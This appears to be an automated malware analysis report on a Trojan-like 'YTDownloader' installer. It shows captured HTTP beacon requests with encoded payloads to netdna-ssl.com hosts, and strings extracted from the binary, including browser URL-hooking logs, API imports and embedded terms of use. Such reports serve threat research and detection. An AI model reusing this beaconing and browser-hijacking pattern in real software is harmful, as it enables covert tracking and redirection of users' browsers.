Cache-Control: private,no-cache, no-store

X-AspNet-Version: 2.0.50727

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
abfgshdgfjhsk....


GET /t.ashx?e=wlkQ3WKgYpSt /KxvF2yaltE/YbzB hRnvZi s3jtzHZ5YIGg5oNPk/IV6ft2BimRteg227sOdIp0kvsY0HPnNlsH9PMWVgeYCpHZc9ZUaGLbhvor/ikhRQC drCF7eFysWDrahxHN3E0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 XpkvY14xYJ8 HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: gk36g6j-hvjtfa3f.netdna-ssl.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:22 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 13

Connection: keep-alive

Cache-Control: private,no-cache, no-store

X-AspNet-Version: 2.0.50727

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
abfgshdgfjhskHTTP/1.1 200 OK..Date: Sat, 20 Jun 2015 16:42:22 GMT..Con
tent-Type: text/html; charset=utf-8..Content-Length: 13..Connection: k
eep-alive..Cache-Control: private,no-cache, no-store..X-AspNet-Version
: 2.0.50727..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X-Cache:
 MISS..abfgshdgfjhsk..

GET /6765.ashx?e=uWabAt9SLcyBuMQa44hX0JareFt XS7lnvZi s3jtzGcl1mVNAzAtk9nl361I435LntfO9v5CwenNguChnjFY9h8tK883C8fdiLeSnalixJzCW7YT37a3xsgiMVE/woTJ0gxPZGJkwMj0/D5C5pj64N7FAIfKHD0333RAvM0VMA04irtcDWeBfFklBXmBrJSjgb6v7cXpPtuHuu2mTp1RABwll NsKggJ1NJoFZyqKwYVgWnVvys8LE7xBDwt4mVUHUwhpTgQgymF592pLJyxGGX0AD6jidFMPF20CMva57cKOVdwGoG5TszfOfx5fXDA6V8R1oJo7qvahkwjxcRjGnDU1S tLbCq4B1iQWYNnk5MTeqccPPQKdfW31f15HrM3NREWq8wbHBGSl3DBfP OYYvVqtMLnONmZFQ6EGE2takpbq4LBcVLP8OH1k7YAfvK748HjafyBo LMQ6LMaamNd3ZXUTzY 8NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFaV2a3pWCTy1K5oVP3GqZY3pzYLgoZ4xWPYfLSvPNwvH3Yi3kp2pYsScwlu2E9 2t9VnlI/iF4X8g== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mx0t7t8a-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:22 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /6765.ashx?e=aQQpsP6/AW18o9SV8EJ33eL7Ikv3r4hlTzgRpqJtmlcgzQKqaxF9u5Q42ZgYGEkGrf8A39sXauhF1v9LxgoeQ9yvhlGeipNVR32ElWRMNBaHh awOSLtGxlpyUxz527unNoSuC9sBhXrbXCO/xHEATaTesKECEwOPqZ0ytD26UhgKkdlz1lRoRWn6c6y/lOVjgb6v7cXpPsanicFAEWgMOasa7G8l/zxJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRgBrvvpkJ9n7A70bqKJZm1WSCxag5O5u4Q/NrfOEITMy HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mx0t7t8a-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:22 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /6765.ashx?e=aQQpsP6/AW18o9SV8EJ33eL7Ikv3r4hlTzgRpqJtmlcgzQKqaxF9u5Q42ZgYGEkGrf8A39sXauhF1v9LxgoeQ9yvhlGeipNVR32ElWRMNBaHh awOSLtGxlpyUxz527unNoSuC9sBhXrbXCO/xHEATaTesKECEwOPqZ0ytD26UhgKkdlz1lRod kiLgUmay4KYX3Ti/i3YOG9SIsJmG3UfDVXG8fnVsUkXiRAgddMCaMVoLWI3pNMYIaukc1i7BWldmt6Vgk8tSuaFT9xqmWN6c2C4KGeMVj2Hy0rzzcLx92It5KdqWLEnMJbthPftrfVZ5SP4heF/I= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mx0t7t8a-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:22 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /6765.ashx?e=aQQpsP6/AW18o9SV8EJ33eL7Ikv3r4hlTzgRpqJtmlcgzQKqaxF9u5Q42ZgYGEkGrf8A39sXauhF1v9LxgoeQ9yvhlGeipNVR32ElWRMNBaHh awOSLtGxlpyUxz527unNoSuC9sBhXrbXCO/xHEATaTesKECEwOPqZ0ytD26UhgKkdlz1lRoZmQz1jSMZVP0JQd5HxgIXdqfANv YB6XIJQffTeIm3ijZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVUd9hJVkTDQWh4fmsDki7RvBFb1hgnFCGg== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mx0t7t8a-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:22 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /6765.ashx?e=aQQpsP6/AW18o9SV8EJ33eL7Ikv3r4hlTzgRpqJtmlcgzQKqaxF9u5Q42ZgYGEkGrf8A39sXauhF1v9LxgoeQ9yvhlGeipNVR32ElWRMNBaHh awOSLtGxlpyUxz527unNoSuC9sBhXrbXCO/xHEATaTesKECEwOPqZ0ytD26UhgKkdlz1lRocgRgxetMCtyAhwsRGINruhH49K9bqCBjptTvQuQU86CVO2qWyDxTHBfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxUlalNSF2h61sBCEmBDvTUu51CUbXbhryEU5MDCXDxgXIDfk8vRSWNDu3xZ0bQ3taLJzSRy ZhIf HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mx0t7t8a-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:22 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /6765.ashx?e=aQQpsP6/AW18o9SV8EJ33eL7Ikv3r4hlTzgRpqJtmlcgzQKqaxF9u5Q42ZgYGEkGrf8A39sXauhF1v9LxgoeQ9yvhlGeipNVR32ElWRMNBaHh awOSLtGxlpyUxz527unNoSuC9sBhXrbXCO/xHEATaTesKECEwOPqZ0ytD26UhgKkdlz1lRoRNUM0FVgKbyMTNAagX5zbhadmUyQT5xNbOt/W9fkCR9JJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRgBrvvpkJ9n7A70bqKJZm1WSCxag5O5u4Q/NrfOEITMy HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mx0t7t8a-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:23 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /6765.ashx?e=aQQpsP6/AW18o9SV8EJ33eL7Ikv3r4hlTzgRpqJtmlcgzQKqaxF9u5Q42ZgYGEkGrf8A39sXauhF1v9LxgoeQ9yvhlGeipNVR32ElWRMNBaHh awOSLtGxlpyUxz527unNoSuC9sBhXrbXCO/xHEATaTesKECEwOPqZ0ytD26UhgKkdlz1lRofsh4s6QQfAos IILilpWF0klpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CTEJJ99zQJTqVYgO0yHAHEsYAqi 8bJ4kL0puLqbigJGAGu  mQn2fsDvRuoolmbVZILFqDk7m7hD82t84QhMzI= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mx0t7t8a-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:23 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /6765.ashx?e=EYAmqppYZO/i yJL96 IZU84EaaibZpXIM0CqmsRfbtxTYwWxYG9WJimSgauFBdeEsZQDBxy5lr5LE/y8BOUO1 JfVwpv1Wv16XIqLxILHtgx1Ht egA6a3os1yMNpRFGzy5vsTaNP0Nk8MlICEx8OzO9WsNY04szht13JQkPmzI/9SA5o1UP3mnx3B3l5XzeWOjOtTpaFDLSflwInKoSsTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5emS9jXjFgnw= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mx0t7t8a-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Sat, 20 Jun 2015 16:42:23 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....

The Trojan connects to the servers at the folowing location(s):

.text

`.rdata

@.data

.rsrc

@.reloc

[email protected]

OtSSh

PSSSSSSh

t!SSh

PSSSSh

j.Yf;

_tcPVj@

.PjRW

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

operator

GetProcessWindowStation

dbghelp.dll

%Y-%m-%dT%H:%M:%SZ

1.3.6.1.4.1.311.2.1.12

Cannot put the trigger ID: %x

{X-hX-hX-XX-XXXXXX}

Host Name: %s

Domain Name: %s

DHCP scope name: %s

GetNetworkParams failed with error: %d

WinHttpGetIEProxyConfigForCurrentUser failed with the following error number:

ERROR_WINHTTP_INTERNAL_ERROR

AutoConfigURL (MyProxyConfig.lpszAutoConfigUrl) is:

AutoConfigURL (MyProxyConfig.lpszProxy) is:

AutoConfigURL (is:

550e832f-a497-4eb7-bb40-8cc856f6d152

RegCreateKeyTransactedW

RegOpenKeyTransactedW

RegDeleteKeyTransactedW

RegDeleteKeyExW

C:\BUILDS\Build_STUB\Installer\Release_YTDK\YTDKi.pdb

GetProcessHeap

KERNEL32.dll

EnumThreadWindows

EnumChildWindows

MsgWaitForMultipleObjectsEx

GetKeyboardLayoutList

USER32.dll

WS2_32.dll

GDI32.dll

RegOpenKeyExW

RegEnumKeyW

RegCloseKey

RegCreateKeyExW

RegDeleteKeyW

RegQueryInfoKeyW

RegEnumKeyExW

RegOpenKeyW

RegNotifyChangeKeyValue

ADVAPI32.dll

ShellExecuteExW

ShellExecuteW

SHELL32.dll

ole32.dll

OLEAUT32.dll

OLEACC.dll

COMCTL32.dll

PSAPI.DLL

CryptMsgClose

CertGetNameStringW

CertFreeCertificateContext

CertFindCertificateInStore

CertCloseStore

CryptMsgGetParam

CRYPT32.dll

VERSION.dll

GetExtendedTcpTable

IPHLPAPI.DLL

WinHttpGetIEProxyConfigForCurrentUser

WINHTTP.dll

SHFileOperationW

RPCRT4.dll

HttpSendRequestExW

HttpSendRequestW

HttpAddRequestHeadersW

HttpQueryInfoW

HttpOpenRequestW

HttpEndRequestW

WININET.dll

GetCPInfo

zcÁ

.?AVChromeBrowserWindow@@

.?AVFirefoxBrowserWindow@@

.?AVOperaBrowserWindow@@

.?AVCHttpFileDownload@@

.?AVCHttpAsync@@

.?AVCHttpDownload@@

.?AVCHttp@@

222222222

55555.ccc

22222222

22222222222

2222222222

222222222222

))aaaaaaaaaaaaa555555.7.??.cccccccAAAAAAAAAAAAA

2222222

..ccc

5.77..Lc7cEEcc7AAATE

|444|44|4

||||4|444

MM.LJ

MMM)MMBMBMBB???BBB??..?....L7.LLLEEEEEATAT

CMIC.CF?

@@,,@@,@@@@

**,,,,@,,@@,,

MMMMMBB???.BB?.7??.7.7LL7.7ELLELL7ETAETTTTT

@@,,@,,,,

MMBB???B?.......777.?.LLLLLLLETT

,,@,,,*,,,*

.hsdy>

,,,,*,,***

,,,@@,**,,,

MBMBBBBBB??????.B??.7c.77.LELL7LEEEL7E

,,****,*

MBMB??BBB???????...??777..LLEL7LAEEcAAATT

,**,,****

B???...7.7.777LLLL7ELAAAAAATAA

BB?.??.....?..LLLELEAAcEAEET

    #    #

B??BBMBB???BB....7777L7.LAATTELE

111111111

11111111111

BBMB?BB????...777.LLLL7LLAET

BB?.?.BBB???...LL7.77LLEEEEELTTTT

RRVVw%%X

#  #1111

BB??..77.7777.777EAEELELET

1111111

11111111

B??BB??..?..7..7L..LLLL

B??B?.B?......?..7.LL7LL

B??.?......LLL..

BB.....77.7LLL..LLEE

MBB??????.7.77.777L

MMBMMB..????....777.LEEE

??7.7.LLLL7LETL

8888888

BB.BB?........L77L

BMMB?B?....777.7.7.EEL

BBB.?B.77.......ETEE

BB.BB........7LLETTT

88888888

B???BB..BB?..7LLLT

BB.??BB..BB..7777L

B???????BB.?...LLLL7

BMB..BB.7.ELLLL77L

BBB??BB.?.LLLL77.

888888888

MBB?....B...cLLLLLLT

___&_&&&

__&&____&

____&___&&

____&__&_&

BM?.BBB?....777L

&&____&__&&__&&____

_&_&&_&&

.njm4tyyxwwwwxyytm3k.

\mbrkBinSub0\msmallFrac0\mdispDef1\mlMargin0\mrMargin0\mdefJc1\mwrapIndent1440\mintLim0\mnaryLim1}{\info{\author udif}{\operator Edith}{\creatim\yr2013\mo10\dy22\hr16\min58}{\revtim\yr2014\mo8\dy24\hr14\min26}{\version5}{\edmins16}{\nofpages4}

{\nofwords2316}{\nofchars13206}{\nofcharsws15492}{\vern57437}}{\*\xmlnstbl {\xmlns1 hXXp://schemas.microsoft.com/office/word/2003/wordml}}\paperw12240\paperh15840\margl1501\margr1502\margt1440\margb1440\gutter0\ltrsect

The following license and terms of use (jointly: "Terms of Use") govern your access and use of the YTDownloader.com website ("Site") and your download, install, access and use of the YTDownloader Browser Application and Add-On ("YTDownloader Add-On") and

ll Site and YTDownloader Add-On contained or displayed information, and any and all available editions, add-ins, tools and documentations, either jointly or separately (collectively and separately known as "YTDownloader"). The Terms of Use are a legally b

ive websites) are each subject to their respective terms and conditions or agreements. Please note that these Terms of Use limit our liability and that we do not provide warranties for YTDownloader or contents. It also limits your remedies.}{\rtlch\fcs1

lely for your private and personal purposes and always in accordance with the Terms and Use and the applicable law. Any other use is prohibited. The use of any software or automated system to extract data from YTDownloader.com or the YTDownloader Add-Ons

is strictly prohibited. You will not disrupt the functioning of the YTDownloader.com or the YTDownloader Add-Ons or otherwise act in a way that interferes with other users\rquote

verse assemble, reverse compile, decompile, disassemble, translate or otherwise alter any executable code, contents or materials on or received via YTDownloader without our prior written consent. You also agree to not remove, obscure, or alter any copyrig

TDownloader temporarily or permanently, with or without notice to you, and are not obligated to support or update the YTDownloader service. You acknowledge and agree that YTDownloader will not be liable to you or any third party in the event that we exerc

\~}{\field{\*\fldinst {\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \f31507\fs20\insrsid3632102 HYPERLINK "mailto:}{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \f31507\fs20\insrsid3632102\charrsid3632102 [email protected]}{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0

\f31507\fs20\insrsid3632102 " }}{\fldrslt {\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \cs18\f31507\fs20\ul\cf2\insrsid3632102\charrsid16527760 [email protected]}}}\sectd \ltrsect

the Site are based on our best judgment but are subject to a number of uncertainties as well as events beyond our control. You understand and agree that your access and use of the Site and its contents is entirely at your own discretion and at your own ri

\par }{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \f31507\fs20\cf1\insrsid1449721\charrsid1449721 YTDownloader includes certain marks, graphics, logos, page headers,

, licensors, suppliers and their respective directors, employees, agents a}{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \f31507\fs20\cf1\insrsid3632102 nd shareholders (jointly: the "}{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0

s to accuracy, performance, merchantability, fitness for a particular purpose, and non-infringement. The Goobzo parties, jointly and severally, also disclaim any warranties and liability regarding the accuracy, completeness, security, reliability, timelin

ss, and performance of the YTDownloader, services and contents. Some countries and jurisdictions do not allow the exclusion or disclaimer of certain terms or warranties, so the above exclusions in whole or in part may not apply to you in your country or j

nder applicable law, in no event shall the Goobzo parties be liable for any damage whatsoever including but not limited to any direct, indirect, consequential, special, exemplary, punitive or incidental damages (including but not limited to damages for lo

s of income or profits, business interruption, loss of business information, loss of goodwill or reputation, and the like) whether such claim is based on warranty, contract, tort (including negligence), or otherwise, and even if the Goobzo parties, jointl

urisdictions do not allow the exclusion or disclaimer or limitation of liability of certain types of damages, so the above exclusions may not apply to you in your country or jurisdiction and in such case the aggregate liability of the Goobzo parties shall

responsibilities and liabilities are not on a joint and several basis (i.e. each member of the Goobzo parties shall be solely responsible for the damages and losses caused by such member.\line }{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0

You may create links to this Site from other websites in as much as it is clear that we do not endorse you or your activity, business, products or services and that you and us are not affiliated in any way.\line }{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0

\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \f31507\fs20\insrsid3632102\charrsid3632102 [email protected]}{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \f31507\fs20\insrsid3632102 " }}{\fldrslt {\rtlch\fcs1 \af1\afs20 \ltrch\fcs0

\cs18\f31507\fs20\ul\cf2\insrsid3632102\charrsid16527760 [email protected]}}}\sectd \ltrsect\linex0\headery708\footery708\colsx708\endnhere\sectlinegrid360\sectdefaultcl\sectrsid8879180\sftnbj {\rtlch\fcs1 \af1\afs20 \ltrch\fcs0

\sbasedon0 \snext17 \sunhideused \styrsid5573618 Normal (Web);}{\*\cs18 \additive \rtlch\fcs1 \af0 \ltrch\fcs0 \sbasedon10 \spriority0 \styrsid5573618 apple-converted-space;}{\*\cs19 \additive \rtlch\fcs1 \af0 \ltrch\fcs0 \ul\cf2

\msmallFrac0\mdispDef1\mlMargin0\mrMargin0\mdefJc1\mwrapIndent1440\mintLim0\mnaryLim1}{\info{\author Edith}{\operator Edith}{\creatim\yr2014\mo3\dy24\hr8\min26}{\revtim\yr2014\mo10\dy27\hr12}{\version22}{\edmins1585}{\nofpages3}{\nofwords2318}

{\nofchars13216}{\nofcharsws15503}{\vern57437}}{\*\xmlnstbl {\xmlns1 hXXp://schemas.microsoft.com/office/word/2003/wordml}}\paperw12240\paperh15840\margl1800\margr1800\margt568\margb1440\gutter0\ltrsect

\b\f40\fs16\insrsid11944020\charrsid14186020 \line }{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\insrsid11944020\charrsid14186020 1. Acceptance of Terms of Use\line The following license and terms of use (jointly: "Terms of Use") go}{\rtlch\fcs1

website ("Site") and your download, install, access and use of the YTDownloader Browser Application and Add-On ("YTDownloader Add-On") and all Site and YTDownloader Add-On contained or displayed information, and any and all available editions, add-ins, t

ols and documentations, either jointly or separately (collectively and separately known as "YTDownloader"). The Terms of Use are a legally binding agreement between you, ("you", "visitor" and/or "user"), and Goobzo Ltd. and its affiliates and subsidiaries

r or parts thereof at our sole discretion and without liability. The products and services described on YTDownloader (and their respective websites) are each subject to their respective terms and conditions or agreements. Please note that these Terms of U

ny other use is prohibited. The use of any software or automated system to extract data from YTDownloader.com or the YTDownloader Add-Ons is strictly prohibited. You will not disrupt the functioning of the YTDownloader.com or the YTDownloader Add-Ons or o

py, modify, adapt, distribute, transmit, translate, display or otherwise exploit YTDownloader and you shall not try to reverse engineer, reverse assemble, reverse compile, decompile, disassemble, translate or otherwise alter any executable code, contents

ith or through the Site. We reserve all rights not expressly granted in and to the Site. We reserve the right to terminate your access to YTDownloader temporarily or permanently, with or without notice to you, and are not obligated to support or update th

YTDownloader service. You acknowledge and agree that YTDownloader will not be liable to you or any third party in the event that we exercise our right to modify or terminate access to the YTDownloader service. Unless explicitly stated otherwise, any new

[email protected]}{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\cf1\insrsid3606027 " }{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\cf1\insrsid3886136 {\*\datafield

0000a5ab0000}}}{\fldrslt {\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \cs19\f40\fs16\ul\cf2\insrsid3606027\charrsid2648633 [email protected]}}}\sectd \ltrsect

looking statements made on the Site are based on our best judgment but are subject to a number of uncertainties as well as events beyond our control. You understand and agree that your access and use of the Site and its contents is entirely at your own di

\f40\fs16\cf1\insrsid11944020\charrsid14186020 . Trademarks\line }{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\cf1\insrsid11944020\charrsid425254 YTDownloader includes certain mark

and personal use only with no warranties whatsoever. Goobzo, its affiliates, partners, licensors, suppliers and their respective directors, employees, agents and shareholders (jointly: the " Goobzo parties") do not assume any liability whatsoever and disc

loader and included services and contents, including, without limitation, warranties as to accuracy, performance, merchantability, fitness for a particular purpose, and non-infringement. The Goobzo parties, jointly and severally, also disclaim any warrant

es and liability regarding the accuracy, completeness, security, reliability, timeliness, and performance of the YTDownloader, services and contents. Some countries and jurisdictions do not allow the exclusion or disclaimer of certain terms or warranties,

, exemplary, punitive or incidental damages (including but not limited to damages for loss of income or profits, business interruption, loss of business information, loss of goodwill or reputation, and the like) whether such claim is based on warranty, co

tract, tort (including negligence), or otherwise, and even if the Goobzo parties, jointly or separately, have been advised of the possibility of such damages or loss. Such limitation of liability shall also apply whether the damages arise from use, misuse

t of personal injury or death arising from the negligence of Goobzo. Some countries and jurisdictions do not allow the exclusion or disclaimer or limitation of liability of certain types of damages, so the above exclusions may not apply to you in your cou

While these limitations of liability provisions use the Goobzo parties definition, the responsibilities and liabilities are not on a joint and several basis (i.e. each member of the Goobzo parties shall be solely responsible for the damages and losses ca

\par 1}{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\cf1\insrsid11944020 1}{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\cf1\insrsid11944020\charrsid14186020 . Links to this Site\line You may create links to this Site from other websites in a

Failure or delay of Goobzo exercise any right, power or remedy under or to require or enforce strict performance by you of any provision of th

\ltrch\fcs0 \f40\fs16\insrsid11944020\charrsid413544 HYPERLINK "mailto:[email protected]" }{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\insrsid11944020\charrsid413544 {\*\datafield

0000a5ab00000066000100d9}}}{\fldrslt {\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \cs19\f40\fs16\ul\cf2\insrsid11944020\charrsid413544 [email protected]}}}\sectd \ltrsect

\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Top of Form;\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Bottom of Form;\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 Normal (Web);\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Acronym;

\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Keyboard;\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Preformatted;\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Sample;\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Typewriter;

<requestedExecutionLevel level='asInvoker' uiAccess='false' />

<assemblyIdentity type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='*' publicKeyToken='6595b64144ccf1df' language='*' />

5$535;5|5

7$7-747]7

78b8s8y8

;#;,;8;=;

8"8(8,82868

3*5{5`6{6

6%7u7

2/3u3

5$6(6,60646

8 8$8(8,8084888<8@8

5 5$5(5,5

7 7$7(7,7074787 ;$;(;,;0;4;8;<;@;

2 202<2\2|2

60686@6\6|6

> ><>@>`>

?(?4?<?\?

8(848<8\8

mscoree.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

portuguese-brazilian

USER32.DLL

Invalid parameter or key doesn't exist.

Floating point (%%e, %%f, %%g, and %%G) is not supported by the WTL::CString class.

The flag CR_INST_STORE_ZIP_ARCHIVES should be used with CR_INST_DONT_SEND_REPORT flag.

%s %s Error Report

CrashSender.exe is not found in the specified path.

crashrpt_lang.ini

l%s\CrashRpt\UnsentCrashReports\%s_%s

Couldn't create crash report directory.

Couldn't set C   exception handlers for main execution thread.

Couldn't launch CrashSender.exe process.

%s-tmp

Local\CrashRptEvent_%s_2

The operation was cancelled by client.

Error launching CrashSender.exe

%s has stopped working

Invalid registry key or invalid destination file is specified.

HKEY_LOCAL_MACHINE\

HKEY_CURRENT_USER\

Empty subkey is not allowed.

The registry key coudn't be open.

Local\CrashRptEvent_%s

%s\%s_%s\%s

%u.%u.%u.%u

chrome.exe

iexplore.exe

firefox.exe

safari.exe

opera.exe

explorer.exe

chrome

firefox

opera

@Google Chrome

Chrome_WidgetWin_1

chrome://settings-frame/#syi516

ChromeGetUrl::Initialize ReRun

ChromeGetUrl Done

ChromeGetUrl::BuildChromeHandles found window class name: %s

ChromeGetUrl::BuildChromeHandles HWNDS: %s

ChromeGetUrl::BuildChromeHandles Could not find Chrome windows, exiting..

%d secs

Name - %s

Value - %s

https

URL: %s changed to: %s

Adding URL:

Adding URL: %s

@Firefox

FirefoxBrowserWindow Found button window, 0x%x

FirefoxBrowserWindow Found browser window, 0x%x

IE9BrowserWindow Found button window, 0x%x

IE9BrowserWindow Found browser window, 0x%x

@Opera

OperaBrowserWindow Found button window, 0x%x

OperaBrowserWindow Found browser window, 0x%x

SafariBrowserWindow Found button window, 0x%x

SafariBrowserWindow Found browser window, 0x%x

ESOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy

GetModule failed. Err=%d

OpenProcess failed. Err=%d

JCertGetNameString failed.

CryptDecodeObject failed with %x

CryptQueryObject failed with %x

CryptMsgGetParam failed with %x

Program Name : %s

Publisher Link : %s

MoreInfo Link : %s

CertFindCertificateInStore failed with %x

CBOT_Condition::IsToInstall Return %d

[CEventsThread::AddEvent] ___Error invalid event handle %d

[CEventsThread::AddEvent] ___Warning event handle already exists %d

[CEventsThread::CreateNamedEvent] ___Error CreateEvent. LE: %d. Try OpenEvent...

[CEventsThread::CreateNamedEvent] ___Error OpenEvent: LE: %d

[CEventsThread::CreateNamedEvent] OpenEvent. LE: %d

[CEventsThread::SetTimeoutResolution] From: %d -> To: %d

[CEventsThread::Cleanup] Closing Handle: %d

[CEventsThread::Cleanup] ___Error CloseHandle(0x%p) failed: %d

[CEventsThread::AlertEvent] ___Error Not found Event: %d

[CEventsThread::AlertEvent] ___Error Invalid Event Entry: %d

[CEventsThread::AlertEvent] ___Error SetEvent failed: %d

[CEventsThread::SetGlobalEvent] Event: %d

[CEventsThread::SetGlobalEvent] ___Error Not found Event: %d

[CEventsThread::SetGlobalEvent] ___Error Invalid Event Entry: %d

[CEventsThread::RemoveEvent] Event: %d

[CEventsThread::RemoveEvent] ___Error Not found Event: %d

[CEventsThread::RemoveEvent] ___Error Invalid Event Entry: %d

[CEventsThread::RemoveEvent] ___Error CloseHandle failed: %d

[CEventsThread::ResetEvent] Event: %d

[CEventsThread::ResetEvent] ___Error Not found Event: %d

[CEventsThread::ResetEvent] ___Error Invalid Event Entry: %d

[CEventsThread::ResetEvent] ___Error ResetEvent failed: %d

[CEventsThread::WaitEvent] TID=%X

[CEventsThread::WaitForMultipleEvents] TID=%X

[CEventsThread::WaitForMultipleEvents] ___Error MsgWaitForMultipleObjectsEx. LE: %d

[CEventsThread::WaitForMultipleEvents] Released on Timeout: %d ms

[CEventsThread::WaitForMultipleEvents] Released on Signaled: %d ms

[CEventsThread::Start] ___Error - Failed to create thread: %X

[CEventsThread::Start - Leave] TID=%X

[CEventsThread::Stop - Enter] TID=%X

[CEventsThread::Stop - Leave] TID=%X

[CEventsThread::Work] TID=%X

[CEventsThread::Work] WAIT_ABANDONED - %d

[CEventsThread::Work] TID=%X - Exit !!!

[CEventsThread::CallProcessTimeoutRoutines] ___Error Invalid Event Entry: %d, Timeout: %d

[CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Index: %d

[CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Entry: %d

Your %s is almost ready for use.

Click YES on the next screen to allow %s to complete integration.

wevtapi.dll

